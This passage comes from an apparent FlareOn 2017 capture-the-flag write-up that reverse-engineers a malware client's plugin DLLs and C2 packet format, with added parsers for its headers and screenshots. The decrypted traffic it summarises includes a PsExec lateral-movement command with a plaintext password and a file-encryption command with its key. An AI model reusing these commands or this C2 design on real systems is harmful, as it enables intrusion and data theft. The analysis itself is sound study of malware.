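def mangle_for_test(entry_point: int, e_lfanew: int = 0x80) -> bytes:
    """Constructed sample: a minimal header in the mangled form (not a real plugin)."""
    img = bytearray(e_lfanew + 0x100)
    img[0:2] = b"LM"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"NOP\0"
    img[e_lfanew + 4:e_lfanew + 6] = b"32"
    struct.pack_into("<I", img, e_lfanew + 0x28, entry_point ^ ENTRY_XOR)
    return bytes(img)
```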
<h4 id="取得-plugins">Obtaining the plugins</h4>
<p>The plugin data can be saved while the packets are being decrypted, or the packets can be replayed to the client over a Python socket; once the client has finished downloading, the file size seen in the <code class="highlighter-rouge">InstallPlugin</code> function is <code class="highlighter-rouge">0x113d954</code></p>
<p><img src="https://i.imgur.com/Bw8vEea.png" alt="" /></p>
<p>Then dump the plugin with IDAPython</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5ac488</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin0.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5ac488</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin1.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5c2238</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin2.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5c2238</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin3.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5d9d90</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin4.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5d9d90</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin5.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5d9d90</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin6.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">file</span> <span class="o">=</span> <span class="n">GetManyBytes</span><span class="p">(</span><span class="mh">0x5d9d90</span><span class="p">,</span> <span class="mh">0x34d954</span><span class="p">)</span>
<span class="n">Python</span><span class="o">></span><span class="nb">open</span><span class="p">(</span><span class="s">"plugin7.dll"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
</code></pre></div></div>
<p>Finally, restore the DLL with the Python script above.</p>
<p><img src="https://i.imgur.com/s8xEGGB.png" alt="" /></p>
<p>At this stage, 8 DLLs can be recovered from <code class="highlighter-rouge">secondstage.exe</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>r.dll
t.dll
6.dll
x.dll
z.dll
f.dll
s.dll
m.dll
</code></pre></div></div>
<h2 id="第四階段-解析封包結構">Stage 4: Parsing the packet structure</h2>
<p>Using a Python socket together with dynamic analysis in IDA, the socket <code class="highlighter-rouge">Recv</code> and <code class="highlighter-rouge">Send</code> functions can be located: <code class="highlighter-rouge">sub_403210</code> handles <code class="highlighter-rouge">Recv</code> and <code class="highlighter-rouge">Decode</code>, and <code class="highlighter-rouge">sub_403600</code> handles <code class="highlighter-rouge">Send</code> and <code class="highlighter-rouge">Encode</code>. The packet structure is as follows</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>0x24 bytes</td>
<td>Decrypt Header</td>
</tr>
<tr>
<td>0x24</td>
<td>0x1c bytes</td>
<td>Compress Header</td>
</tr>
<tr>
<td>0x40</td>
<td>0x24 bytes</td>
<td>Processor Header</td>
</tr>
<tr>
<td>0x60</td>
<td>-</td>
<td>Data</td>
</tr>
</tbody>
</table>
<p>In the first attempt at decrypting packets, only the structure of the <code class="highlighter-rouge">Decrypt Header</code> could be understood, from the first few unencrypted packets; there was not yet enough information to understand the full packet structure. More complete analysis information became available after the remaining plugins were downloaded.</p>
<p>In addition, while decrypting packets it became apparent that each plugin has a unique 16-byte ID. When the C2 server talks to the client it references one of these IDs to invoke that plugin's functionality, so the plugin IDs can also be found in the packets.</p>
<h3 id="decrypt-header-size-0x24">Decrypt Header (size: 0x24)</h3>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>4 bytes</td>
<td>year</td>
<td>32303137</td>
</tr>
<tr>
<td>0x04</td>
<td>4 bytes</td>
<td>crc32 checksum</td>
<td>3f2a4b2f</td>
</tr>
<tr>
<td>0x08</td>
<td>4 bytes</td>
<td>Packet header size</td>
<td>24000000</td>
</tr>
<tr>
<td>0x0C</td>
<td>4 bytes</td>
<td>data EncSize</td>
<td>60000000</td>
</tr>
<tr>
<td>0x10</td>
<td>4 bytes</td>
<td>data DecSize</td>
<td>60000000</td>
</tr>
<tr>
<td>0x14</td>
<td>16 bytes</td>
<td>(GUID) cryptor id</td>
<td>51298f741667d7ed2941950106f50545 -> default</td>
</tr>
</tbody>
</table>
<h3 id="compress-header-size-0x1c">Compress Header (size: 0x1c)</h3>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x24</td>
<td>4 bytes</td>
<td>Compress header size</td>
<td>1c000000</td>
</tr>
<tr>
<td>0x28</td>
<td>4 bytes</td>
<td>data EncSize</td>
<td>44000000</td>
</tr>
<tr>
<td>0x2c</td>
<td>4 bytes</td>
<td>data DecSize</td>
<td>44000000</td>
</tr>
<tr>
<td>0x3c</td>
<td>16 bytes</td>
<td>(GUID) compressor id</td>
<td>f37126ad88a5617eaf06000d424c5a21 -> default</td>
</tr>
</tbody>
</table>
<h3 id="processor-header-size-0x24">Processor Header (size: 0x24)</h3>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x40</td>
<td>4 bytes</td>
<td>version</td>
<td>17041720</td>
</tr>
<tr>
<td>0x44</td>
<td>4 bytes</td>
<td>cmd</td>
<td>07000000</td>
</tr>
<tr>
<td>0x48</td>
<td>4 bytes</td>
<td>msgId</td>
<td>08000000</td>
</tr>
<tr>
<td>0x4c</td>
<td>4 bytes</td>
<td>status</td>
<td>00000000</td>
</tr>
<tr>
<td>0x50</td>
<td>4 bytes</td>
<td>status</td>
<td>00000000</td>
</tr>
<tr>
<td>0x54</td>
<td>16 bytes</td>
<td>(GUID) processor id</td>
<td>155bbf4a1efe1517734604b9d42b80e8 -> default</td>
</tr>
</tbody>
</table>
<h2 id="第五階段-分析-plugins-解密封包與還原-c2-server">Stage 5: Analysing the Plugins, Decrypting the Packets and Recovering the C2 Server</h2>
<p>To speed up the analysis, diff the DLLs against each other to see which functions differ; the functions that differ are likely to be each DLL's important functionality. Diffing saves a lot of time and lets you concentrate on those functions.</p>
<h3 id="decrypt-id-crpt">Decrypt ID (CRPT)</h3>
<table>
<thead>
<tr>
<th>Decrypt ID</th>
<th>Name</th>
<th>Version</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>51298F741667D7ED2941950106F50545</td>
<td>-</td>
<td>-</td>
<td>Default</td>
</tr>
<tr>
<td>c30b1a2dcb489ca8a724376469cf6782</td>
<td>r.dll</td>
<td>1.0.4</td>
<td>Rc4</td>
</tr>
<tr>
<td>38be0f624ce274fc61f75c90cb3f5915</td>
<td>t.dll</td>
<td>1.1.8</td>
<td>simple substitution cipher</td>
</tr>
<tr>
<td>ba0504fcc08f9121d16fd3fed1710e60</td>
<td>6.dll</td>
<td>1.0.4</td>
<td>CustomBase64</td>
</tr>
<tr>
<td>b2e5490d2654059bbbab7f2a67fe5ff4</td>
<td>x.dll</td>
<td>1.0.1</td>
<td>XTEA</td>
</tr>
</tbody>
</table>
<h3 id="compress-id-comp">Compress ID (COMP)</h3>
<table>
<thead>
<tr>
<th>Compress ID</th>
<th>Name</th>
<th>Version</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>f37126ad88a5617eaf06000d424c5a21</td>
<td>-</td>
<td>-</td>
<td>Default</td>
</tr>
<tr>
<td>5fd8ea0e9d0a92cbe425109690ce7da2</td>
<td>z.dll</td>
<td>1.2.11</td>
<td>Zlib</td>
</tr>
</tbody>
</table>
<h3 id="processor-id-cmd">Processor ID (CMD)</h3>
<table>
<thead>
<tr>
<th>Processor ID</th>
<th>Name</th>
<th>Version</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>155bbf4a1efe1517734604b9d42b80e8</td>
<td>-</td>
<td>-</td>
<td>Default</td>
</tr>
<tr>
<td>f47c51070fa8698064b65b3b6e7d30c6</td>
<td>f.dll</td>
<td>2.1.2</td>
<td>File</td>
</tr>
<tr>
<td>f46d09704b40275fb33790a362762e56</td>
<td>s.dll</td>
<td>1.1.0</td>
<td>Shell</td>
</tr>
<tr>
<td>a3aecca1cb4faa7a9a594d138a1bfbd5</td>
<td>m.dll</td>
<td>1.0.4</td>
<td>Screen</td>
</tr>
<tr>
<td>77d6ce92347337aeb14510807ee9d7be</td>
<td>p.dll</td>
<td>1.3.0</td>
<td>Socket</td>
</tr>
</tbody>
</table>
<h4 id="processor-id-f47c51070fa8698064b65b3b6e7d30c6---file">Processor ID: f47c51070fa8698064b65b3b6e7d30c6 -> File</h4>
<p><code class="highlighter-rouge">0x100058B0</code> is used to <code class="highlighter-rouge">Recv</code> packet data; its command set is:</p>
<table>
<thead>
<tr>
<th>Command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x1</td>
<td>GetDriveInfo: 0x228 bytes per drive</td>
</tr>
<tr>
<td>0x2</td>
<td>List directory</td>
</tr>
<tr>
<td>0x3</td>
<td>Download File (to server)</td>
</tr>
<tr>
<td>0x5</td>
<td>Close File</td>
</tr>
<tr>
<td>0x6</td>
<td>Upload File (to client): opens a file for writing; the header contains a SHA1</td>
</tr>
<tr>
<td>0x7</td>
<td>After the file is written a SHA1 is produced and compared against the SHA1 from cmd = 0x6 to confirm the transfer completed</td>
</tr>
<tr>
<td>0x8</td>
<td>Ping</td>
</tr>
<tr>
<td>0x9</td>
<td>Ping</td>
</tr>
<tr>
<td>0xa</td>
<td>Ping</td>
</tr>
</tbody>
</table>
<h4 id="processor-id-f46d09704b40275fb33790a362762e56---shell">Processor ID: f46d09704b40275fb33790a362762e56 -> Shell</h4>
<p>This plugin behaves much like <code class="highlighter-rouge">cmd.exe</code>: <code class="highlighter-rouge">0x100019B0</code> is used to <code class="highlighter-rouge">Recv</code> data, while <code class="highlighter-rouge">0x100017D0</code> handles the response returned by the shell. Its command set is:</p>
<table>
<thead>
<tr>
<th>Command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x1</td>
<td>Start Shell (<code class="highlighter-rouge">Windows Reverse Shell</code>)</td>
</tr>
<tr>
<td>0x2</td>
<td>Close Shell</td>
</tr>
<tr>
<td>0x3</td>
<td>Cmd command</td>
</tr>
<tr>
<td>0x4</td>
<td>Shell Response</td>
</tr>
</tbody>
</table>
<h4 id="processor-id--a3aecca1cb4faa7a9a594d138a1bfbd5---screen">Processor ID = a3aecca1cb4faa7a9a594d138a1bfbd5 -> Screen</h4>
<p>Used for taking screenshots and sending the image; understanding the BMP file format is required here. Its command set is:</p>
<table>
<thead>
<tr>
<th>Command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x1</td>
<td>Take Screenshot</td>
</tr>
<tr>
<td>0x2</td>
<td><code class="highlighter-rouge">BITMAPFILEHEADER</code>: size, width, height, color_depths</td>
</tr>
<tr>
<td>0x3</td>
<td>Collect bitmap data</td>
</tr>
</tbody>
</table>
<p>BITMAPFILEHEADER</p>
<table>
<thead>
<tr>
<th>Header info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>Size</td>
<td>1064</td>
</tr>
<tr>
<td>width</td>
<td>1418</td>
</tr>
<tr>
<td>height</td>
<td>730</td>
</tr>
<tr>
<td>color depths</td>
<td>8 bit per pixel</td>
</tr>
</tbody>
</table>
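<p>The following is an added example, not the write-up's own <code class="highlighter-rouge">PacketDecode.py</code>. It rebuilds a <code class="highlighter-rouge">.bmp</code> file from the two pieces the Screen plugin sends: the DIB header block (the write-up's "Size" of 1064 bytes is the 40-byte <code class="highlighter-rouge">BITMAPINFOHEADER</code> plus a 256-entry palette, which is what an 8 bit-per-pixel image needs) followed by the raw pixel rows. The 14-byte <code class="highlighter-rouge">BITMAPFILEHEADER</code> is not transmitted and must be prepended; its pixel-data offset is 14 plus the length of the DIB block, i.e. 1078 for this image. The greyscale palette, the 3x2 sample image and the pixel-per-metre values are constructed for the example.</p>

```python
"""Rebuild a .bmp from a transmitted DIB block plus raw pixel rows (added example).

The write-up's Screen plugin sends 'Size' (length of the DIB block), width, height
and bit depth, then the pixel data.  For 8 bpp the DIB block is 40 + 256*4 = 1064
bytes, so the pixel offset in the file header must be 14 + 1064 = 1078.
"""
import struct

FILE_HDR = struct.Struct("<2sIHHI")        # bfType, bfSize, bfReserved1/2, bfOffBits (14 bytes)
INFO_HDR = struct.Struct("<IiiHHIIiiII")   # BITMAPINFOHEADER (40 bytes)


def row_stride(width, bpp):
    """BMP pixel rows are padded to a multiple of 4 bytes."""
    return ((width * bpp + 31) // 32) * 4


def make_dib_block(width, height, bpp):
    """Constructed DIB block in the shape the plugin sends: header + greyscale palette for 8 bpp."""
    colors = 256 if bpp == 8 else 0
    image_size = row_stride(width, bpp) * abs(height)
    hdr = INFO_HDR.pack(INFO_HDR.size, width, height, 1, bpp, 0, image_size,
                        2835, 2835, colors, colors)      # 2835 px/m is an assumed value
    palette = b"".join(struct.pack("<BBBB", i, i, i, 0) for i in range(colors))
    return hdr + palette


def dib_dimensions(dib):
    """Read width, height and bit depth back out of a DIB block."""
    size, width, height, planes, bpp = struct.unpack_from("<IiiHH", dib, 0)
    if size != INFO_HDR.size or planes != 1 or bpp not in (1, 4, 8, 16, 24, 32):
        raise ValueError("not a BITMAPINFOHEADER this helper understands")
    return width, height, bpp


def build_bmp(dib, pixels):
    """Prepend the file header; refuse pixel data whose length contradicts the header."""
    width, height, bpp = dib_dimensions(dib)
    expected = row_stride(width, bpp) * abs(height)
    if len(pixels) != expected:
        raise ValueError("pixel data is %d bytes, header implies %d" % (len(pixels), expected))
    offset = FILE_HDR.size + len(dib)             # pixel data starts after header + palette
    return FILE_HDR.pack(b"BM", offset + len(pixels), 0, 0, offset) + dib + pixels


def bmp_pixel_offset(bmp):
    """Return bfOffBits of a finished file, checking the BM magic first."""
    magic, _size, _r1, _r2, offset = FILE_HDR.unpack_from(bmp, 0)
    if magic != b"BM":
        raise ValueError("missing BM magic")
    return offset


if __name__ == "__main__":
    dib = make_dib_block(3, 2, 8)                 # tiny constructed 3x2 image, 8 bpp
    bmp = build_bmp(dib, bytes(range(8)))         # 2 rows of stride 4
    print(len(dib), bmp_pixel_offset(bmp), len(bmp))
```

<p>The numbers line up with the write-up: a 1418 x 730 image at 8 bpp has rows padded to 1420 bytes, so the pixel data is 1,036,600 bytes and the whole file 14 + 1064 + 1,036,600 = 1,037,678 bytes, which is exactly the size in the dumped name <code class="highlighter-rouge">screen_1037678.bmp</code>. The write-up's <code class="highlighter-rouge">save_bmp</code> writes 54 as the pixel offset with 1078 left in a comment; 54 only holds for an image without a palette, so for this 8 bpp capture 1078 is the value consistent with the header size.</p>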
<p>Through this plugin we obtain a BMP file, <code class="highlighter-rouge">screen_1037678.bmp</code>, which contains the Zip password used later: <code class="highlighter-rouge">infectedinfectedinfectedinfectedinfected919</code></p>
<p><img src="https://i.imgur.com/TyWyjGv.png" alt="" /></p>
<h4 id="processor-id--77d6ce92347337aeb14510807ee9d7be---socket">Processor ID = 77d6ce92347337aeb14510807ee9d7be -> Socket</h4>
<p>Through this plugin we can capture the server's packets and recover more information</p>
<table>
<thead>
<tr>
<th>command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x1</td>
<td>Start Socket</td>
</tr>
<tr>
<td>0x2</td>
<td>Close Socket</td>
</tr>
<tr>
<td>0x3</td>
<td>Connect</td>
</tr>
<tr>
<td>0x4</td>
<td>Recv</td>
</tr>
</tbody>
</table>
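<p>As an added example that is not part of the write-up or its <code class="highlighter-rouge">PacketDecode.py</code>, the parser below walks the three nested headers from the tables above (Decrypt, Compress, Processor), maps the 16-byte cryptor, compressor and processor IDs to the plugin names listed in the ID tables, and labels the processor command using the per-plugin command tables. It assumes the compressor ID sits directly after the compress layer's DecSize, at offset 0x30 (the value consistent with the 0x1c header size and the processor header starting at 0x40), and it only descends into a layer when that layer's ID is the default one, since a non-default ID means the payload still has to be decrypted or decompressed by the matching DLL first. What the crc32 field covers is not stated in the write-up, so the sample builder computes it over the payload purely for the constructed test packet.</p>

```python
"""Parse the nested Decrypt / Compress / Processor headers (added example).

All integers are little-endian; offsets are from the start of the packet:
  0x00  Decrypt header   (0x24): year(4) crc32(4) hdr_size(4) enc_size(4) dec_size(4) cryptor_id(16)
  0x24  Compress header  (0x1c): hdr_size(4) enc_size(4) dec_size(4) compressor_id(16)
  0x40  Processor header (0x24): version(4) cmd(4) msg_id(4) status(4) status(4) processor_id(16)
"""
import struct
import zlib

DECRYPT_HDR = struct.Struct("<4sIIII16s")    # 0x24 bytes
COMPRESS_HDR = struct.Struct("<III16s")      # 0x1c bytes
PROCESSOR_HDR = struct.Struct("<IIIII16s")   # 0x24 bytes

DEFAULT_CRYPTOR = "51298f741667d7ed2941950106f50545"
DEFAULT_COMPRESSOR = "f37126ad88a5617eaf06000d424c5a21"
FILE_ID = "f47c51070fa8698064b65b3b6e7d30c6"

# ID tables from the write-up.
CRYPTORS = {DEFAULT_CRYPTOR: "default",
            "c30b1a2dcb489ca8a724376469cf6782": "r.dll (RC4)",
            "38be0f624ce274fc61f75c90cb3f5915": "t.dll (substitution)",
            "ba0504fcc08f9121d16fd3fed1710e60": "6.dll (CustomBase64)",
            "b2e5490d2654059bbbab7f2a67fe5ff4": "x.dll (XTEA)"}
COMPRESSORS = {DEFAULT_COMPRESSOR: "default",
               "5fd8ea0e9d0a92cbe425109690ce7da2": "z.dll (Zlib)"}
PROCESSORS = {"155bbf4a1efe1517734604b9d42b80e8": "default",
              FILE_ID: "f.dll (File)",
              "f46d09704b40275fb33790a362762e56": "s.dll (Shell)",
              "a3aecca1cb4faa7a9a594d138a1bfbd5": "m.dll (Screen)",
              "77d6ce92347337aeb14510807ee9d7be": "p.dll (Socket)"}
# Per-plugin command tables from the write-up (the File table lists no 0x4).
COMMANDS = {
    FILE_ID: {1: "GetDriveInfo", 2: "ListDirectory", 3: "DownloadFile", 5: "CloseFile",
              6: "UploadFile", 7: "UploadDone", 8: "Ping", 9: "Ping", 10: "Ping"},
    "f46d09704b40275fb33790a362762e56": {1: "StartShell", 2: "CloseShell", 3: "Command", 4: "ShellResponse"},
    "a3aecca1cb4faa7a9a594d138a1bfbd5": {1: "TakeScreenshot", 2: "BitmapHeader", 3: "BitmapData"},
    "77d6ce92347337aeb14510807ee9d7be": {1: "StartSocket", 2: "CloseSocket", 3: "Connect", 4: "Recv"},
}


def parse_headers(packet):
    """Walk the layers from the outside in; stop at the first one that needs a non-default plugin."""
    if len(packet) < DECRYPT_HDR.size:
        raise ValueError("packet shorter than the decrypt header")
    year, crc, hsize, enc, dec, cid = DECRYPT_HDR.unpack_from(packet, 0)
    if hsize != DECRYPT_HDR.size:
        raise ValueError("unexpected decrypt header size 0x%x" % hsize)
    payload = packet[hsize:hsize + enc]
    if len(payload) != enc:
        raise ValueError("truncated packet: want %d payload bytes, have %d" % (enc, len(payload)))
    info = {"year": year.decode("ascii", "replace"), "crc32": crc,  # crc coverage not given in the write-up
            "enc_size": enc, "dec_size": dec,
            "cryptor": CRYPTORS.get(cid.hex(), "unknown:" + cid.hex()),
            "compressor": None, "processor": None, "cmd": None, "action": None, "body": None}
    if cid.hex() != DEFAULT_CRYPTOR:
        return info                  # decrypt payload with the named DLL's scheme, then parse it again
    if len(payload) < COMPRESS_HDR.size:
        raise ValueError("payload shorter than the compress header")
    csize, cenc, cdec, comp = COMPRESS_HDR.unpack_from(payload, 0)
    if csize != COMPRESS_HDR.size:
        raise ValueError("unexpected compress header size 0x%x" % csize)
    inner = payload[csize:csize + cenc]
    info["compressor"] = COMPRESSORS.get(comp.hex(), "unknown:" + comp.hex())
    if comp.hex() != DEFAULT_COMPRESSOR:
        return info                  # e.g. zlib.decompress(inner) first when z.dll is named
    if len(inner) < PROCESSOR_HDR.size:
        raise ValueError("inner data shorter than the processor header")
    version, cmd, msg_id, st1, st2, pid = PROCESSOR_HDR.unpack_from(inner, 0)
    info.update(version=version, cmd=cmd, msg_id=msg_id, status=(st1, st2),
                processor=PROCESSORS.get(pid.hex(), "unknown:" + pid.hex()),
                action=COMMANDS.get(pid.hex(), {}).get(cmd, "unknown-cmd-0x%x" % cmd),
                body=inner[PROCESSOR_HDR.size:])
    return info


def build_sample_packet(cmd, body, processor_id=FILE_ID, cryptor_id=DEFAULT_CRYPTOR):
    """Constructed test packet using the example values from the tables (year '2017',
    version 0x20170417, msgId 8).  A non-default cryptor_id is written without encrypting
    anything; it only exercises the early return in parse_headers."""
    inner = PROCESSOR_HDR.pack(0x20170417, cmd, 8, 0, 0, bytes.fromhex(processor_id)) + body
    payload = COMPRESS_HDR.pack(COMPRESS_HDR.size, len(inner), len(inner),
                                bytes.fromhex(DEFAULT_COMPRESSOR)) + inner
    return DECRYPT_HDR.pack(b"2017", zlib.crc32(payload) & 0xFFFFFFFF, DECRYPT_HDR.size,
                            len(payload), len(payload), bytes.fromhex(cryptor_id)) + payload


if __name__ == "__main__":
    print(parse_headers(build_sample_packet(2, b"A" * 32)))
```

<p>With a 32-byte body the constructed packet reproduces the sizes in the tables' example column: EncSize 0x60 in the decrypt header, 0x44 in the compress header, and a total of 0x84 bytes. Replacing the cryptor ID with the RC4 plugin's ID makes the parser stop after the first layer and report which DLL's decryption has to run before the inner headers can be read.</p>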
<h3 id="c2-server-srv2exepseexe-與-cfexe-以及-client-封包資訊整理">C2 Server (srv2.exe), pse.exe, cf.exe and Client Packet Summary</h3>
<p>Besides the plugins discussed above, the decryption process lets us collect some useful information from the packets, such as victim details, information about <code class="highlighter-rouge">lab10</code>, and a few files:</p>
<ul>
<li>Via m.dll, a screenshot taken on host <code class="highlighter-rouge">192.168.221.91</code> yields the zip password <code class="highlighter-rouge">infectedinfectedinfectedinfectedinfected919</code></li>
<li>Via s.dll, the TODO.txt file in the <code class="highlighter-rouge">c:\work\FlareOn2017\Challenge_10</code> directory was viewed; its content is <code class="highlighter-rouge">Check with Larry about this.</code></li>
<li>Via s.dll, <code class="highlighter-rouge">ping larryjohnson-pc</code> was run, which reveals the client's IP as <code class="highlighter-rouge">192.168.221.105</code>.</li>
<li>Via f.dll, <code class="highlighter-rouge">pse.exe</code> and <code class="highlighter-rouge">srv2.exe</code> were downloaded. <code class="highlighter-rouge">pse.exe</code> is Windows Sysinternals PsExec, a tool for running commands remotely; it was used to move laterally within the internal network to <code class="highlighter-rouge">192.168.221.105</code> and run <code class="highlighter-rouge">srv2.exe</code>, which listens on port <code class="highlighter-rouge">16452</code>. The command was <code class="highlighter-rouge">pse.exe \\larryjohnson-pc -i -c -f -d -u larry.johnson -p n3v3rgunnag1veUup -accepteula srv2.exe</code>. <code class="highlighter-rouge">srv2.exe</code> is the C2 server; the difference from the client <code class="highlighter-rouge">secondstage.exe</code> is that <code class="highlighter-rouge">secondstage.exe</code> initiates the connection, whereas <code class="highlighter-rouge">srv2.exe</code> waits for one.</li>
<li>The encryption program <code class="highlighter-rouge">c:\staging\cf.exe</code> was downloaded on larryjohnson-pc</li>
<li>The encryption program <code class="highlighter-rouge">cf.exe</code> was used to encrypt <code class="highlighter-rouge">lab10</code>; the original file was then deleted and the result sent to the server over the socket</li>
</ul>
<p>Originally we only had the client's program and packets; after decrypting the client's packets we also obtained the C2 server's program and packets. Next, the C2 server's packets are decrypted to collect more information about <code class="highlighter-rouge">lab10</code>.</p>
<h2 id="第六階段-解密-c2-server-的封包">Stage 6: Decrypting the C2 Server's Packets</h2>
<p>With the client's packets decrypted, this stage decrypts the C2 server's packets and recovers the server's information, commands and so on.</p>
<h3 id="decrypt-id-crpt-1">Decrypt ID (CRPT)</h3>
<table>
<thead>
<tr>
<th>Decrypt ID</th>
<th>Name</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>2965e4a19b6e9d9473f5f54dfef93533</td>
<td>b.dll</td>
<td>Blowfish</td>
</tr>
<tr>
<td>8746e7b7b0c1b9cf3f11ecae78a3a4bc</td>
<td>e.dll</td>
<td>SimpleXOR</td>
</tr>
<tr>
<td>46c5525904f473ace7bb8cb58b29968a</td>
<td>d.dll</td>
<td>DES3</td>
</tr>
<tr>
<td>9b1f6ec7d9b42bf7758a094a2186986b</td>
<td>c.dll</td>
<td>Camellia</td>
</tr>
</tbody>
</table>
<h3 id="compress-id-comp-1">Compress ID (COMP)</h3>
<table>
<thead>
<tr>
<th>Compress ID</th>
<th>Name</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>0a7874d2478a7713705e13dd9b31a6b1</td>
<td>l.dll</td>
<td>Lzo</td>
</tr>
<tr>
<td>503b6412c75a7c7558d1c92683225449</td>
<td>a.dll</td>
<td>ApLib</td>
</tr>
</tbody>
</table>
<h3 id="server-的資訊">Server information</h3>
<table>
<thead>
<tr>
<th>Computer Info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>2.1.0</td>
</tr>
<tr>
<td>computer name</td>
<td>LARRYJOHNSON-PC</td>
</tr>
<tr>
<td>user name</td>
<td>larry.johnson</td>
</tr>
<tr>
<td>group name</td>
<td>feye2017 srv</td>
</tr>
</tbody>
</table>
<h3 id="server-封包資訊整理">Server packet summary</h3>
<ul>
<li>A BMP image (32 bits) was captured, probably a hint to the solver that the solution is related to <code class="highlighter-rouge">lab10</code></li>
</ul>
<p><img src="https://i.imgur.com/r8EByPw.png" alt="" /></p>
<ul>
<li><code class="highlighter-rouge">cf.exe</code> was used to encrypt lab10.zip into <code class="highlighter-rouge">lab10.zip.cry</code>; the command was <code class="highlighter-rouge">c:\staging\cf.exe lab10.zip tCqlc2+fFiLcuq1ee1eAPOMjxcdijh8z0jrakMA/jxg=</code></li>
<li><code class="highlighter-rouge">lab10.zip</code> was deleted and the shell closed</li>
</ul>
<h2 id="第七階段-還原-lab10zipcry">Stage 7: Recovering lab10.zip.cry</h2>
<p><code class="highlighter-rouge">lab10.zip.cry</code> is a file that starts with <code class="highlighter-rouge">cryp</code> and is 561972 bytes in size. It can be dumped from the C2 server's packets, because the packets show that the encryption program <code class="highlighter-rouge">cf.exe</code> encrypts <code class="highlighter-rouge">lab10</code>, deletes the original file, and sends the result to the server over the socket.</p>
<p><img src="https://i.imgur.com/3imYvqG.png" alt="" /></p>
<h3 id="分析加密程式-cfexe">Analysing the encryption program <code class="highlighter-rouge">cf.exe</code></h3>
